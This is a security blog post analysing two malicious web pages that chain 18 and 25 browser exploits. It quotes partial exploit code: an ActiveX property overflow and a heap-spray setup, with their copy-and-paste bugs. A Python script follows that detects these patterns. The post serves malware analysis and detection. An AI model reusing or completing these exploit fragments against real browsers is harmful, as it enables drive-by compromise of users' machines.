18, 25 exploits: who gives more? Oh, and 2 bugs.

Just a couple of weeks ago I was thinking that 17 exploits in one JavaScript attack were a lot. Well, it isn't so. I've recently stumbled upon a couple of pages that contain 18 and 25 different exploits. The hosts serving the pages are, respectively, google-analistyc.net and 85.17.166.230.

if (
   office() ||
   dl() ||
   pdf() ||
   wme() ||
   ya1() ||
   ya2() ||
   fb() ||
   mdss() ||
   creative() ||
   wks() ||
   ogame() ||
   ca() ||
   buddy() ||
   gomweb() ||
   xmlcore() ||
   quick() ||
   real() ||
   ntaudio()
   ) {}

Here are the exploits we haven't already seen:

The second page has 25 exploits:

if (
   mdac() ||
   dl() ||
   flash() ||
   pdf() ||
   wme() ||
   wfi() ||
   com() ||
   ya1() ||
   ya2() ||
   fb() ||
   mdss() ||
   cr1() ||
   cr2() ||
   cr3() ||
   cr4() ||
   creative() ||
   wks() ||
   ogame() ||
   ca() ||
   buddy() ||
   gomweb() ||
   xmlcore() ||
   quick() ||
   real() ||
   ntaudio()
   ) {}

Here, the "new" ones are:

Now, regarding the second part of the title: there seem to be at least two bugs in these exploit codes.

First, the function cr3 instantiates the control with CLSID 07B18EAB-A523-4961-B6BB-170DE4475CCA and then sets its ShortFormat property. This property doesn't seem to exist on that control. ShortFormat is, instead, the attack vector of the exploit against the Ask Toolbar (the one in the cr2 function). It's probably a case of wrong copy-and-paste.

function cr3() {
  try {
    var obj = null;
    obj = cobj("{07B18EAB-A523-4961-B6BB-170DE4475CCA}");
    if (obj) {
      ms2();
      arg1 = unescape("\x0c");
      while (arg1.length < 0x200) arg1 += unescape("\x0c");
      obj.ShortFormat = arg1; // property of the Ask Toolbar control (cr2), not of this one
    }
  } catch (e) {}
  return 0;
}

Second, and this one is present in both pages, the mdss function gets its memory allocation wrong. It creates a string (in the buf variable) and then doubles its length in a loop that is meant to run 9999 times. Of course, this doesn't bode well: the machine will likely lock up before the offending process runs out of memory and, finally, gets killed.

function mdss() {
  try {
    var obj = null;
    obj = cobj("{EEE78591-FE22-11D0-8BEF-0060081841DE}");
    if (obj) {
      ms();
      var buf = addr(0x0c0c0c0c);
      for (i = 1; i <= 9999; i++)
        buf += buf; // doubles buf on every pass: 2^9999 times the original length
      EngineID = "default";
      ...

Interestingly, the original milw0rm exploit did the right thing:

var buf = unescape("%u4141");
while (buf.length <= 261) buf = buf + unescape("%u4141");

Probably, another case of wrong copy-and-paste...
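As an added, defender-side example (not code from this post or from the exploit pages), the following Python triage script pulls out of a captured page exactly the tells discussed above: the `if (a() || b() || ...) {}` probe chain, the CLSID each function instantiates and the property it sets, a trigger property reused across different CLSIDs (the cr3 ShortFormat slip), and a `buf += buf` loop driven by a fixed iteration count instead of a length check (the mdss bug). The sample JavaScript is constructed; the cr2 CLSID is a placeholder, while the cr3 and mdss CLSIDs are the ones quoted in the post.

```python
import re

# Constructed sample (not the live page): the cr2 CLSID is a placeholder, the cr3 and mdss ones are quoted in the post.
SAMPLE_JS = r"""
if ( cr2() ||
     cr3() ||
     mdss() ) {}
function cr2() { try { var obj=cobj("{AAAAAAAA-0000-0000-0000-000000000001}");
  if(obj) { obj.ShortFormat = arg1; } } catch(e) {} return 0; }
function cr3() { try { var obj=cobj("{07B18EAB-A523-4961-B6BB-170DE4475CCA}");
  if(obj) { obj.ShortFormat = arg1; } } catch(e) {} return 0; }
function mdss(){ try { var obj=cobj("{EEE78591-FE22-11D0-8BEF-0060081841DE}");
  if(obj){ var buf = addr(0x0c0c0c0c);
    for (i=1;i<=9999;i++)
    buf += buf; } } catch(e) {} return 0; }
"""

CLSID_RE = re.compile(r'cobj\("\{([0-9A-Fa-f-]{36})\}"\)')  # ActiveX instantiation
PROP_RE = re.compile(r"obj\.(\w+)\s*=")                        # property used as trigger
CHAIN_RE = re.compile(r"if\s*\(\s*((?:\w+\(\)\s*\|\|\s*)+\w+\(\))\s*\)\s*\{\s*\}")
DOUBLING_RE = re.compile(  # `for (i=1;i<=N;i++) buf += buf;` with no length check at all
    r"for\s*\(\s*\w+\s*=\s*\d+\s*;\s*\w+\s*<=?\s*(\d+)[^)]*\)\s*(\w+)\s*\+=\s*\2\s*;")

def split_functions(js):
    """Yield (name, body) for each `function name() {...}` by matching braces."""
    for m in re.finditer(r"function\s+(\w+)\s*\(\)\s*\{", js):
        depth, i = 1, m.end()
        while i < len(js) and depth:
            depth += {"{": 1, "}": -1}.get(js[i], 0)
            i += 1
        yield m.group(1), js[m.end():i - 1]

def triage(js):
    """Probe chain, per-function CLSID/property facts, and the two copy-paste tells."""
    chain = CHAIN_RE.search(js)
    report = {"chain": re.findall(r"(\w+)\(\)", chain.group(1)) if chain else [],
              "functions": {}, "unbounded_doubling": []}
    owners = {}  # property name -> set of CLSIDs it is assigned on
    for name, body in split_functions(js):
        clsids, props = CLSID_RE.findall(body), PROP_RE.findall(body)
        report["functions"][name] = {"clsids": clsids, "props": props}
        for p in props:
            owners.setdefault(p, set()).update(clsids)
        d = DOUBLING_RE.search(body)
        if d:  # (function, doubled variable, iteration count)
            report["unbounded_doubling"].append((name, d.group(2), int(d.group(1))))
    # the same trigger property set on several CLSIDs is the cr3-style pasted stub
    report["shared_props"] = {p: sorted(c) for p, c in owners.items() if len(c) > 1}
    return report
```

Run `triage()` over the script text of a captured page; a long probe chain, a property shared across CLSIDs and a fixed-count doubling loop are each worth a closer look.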
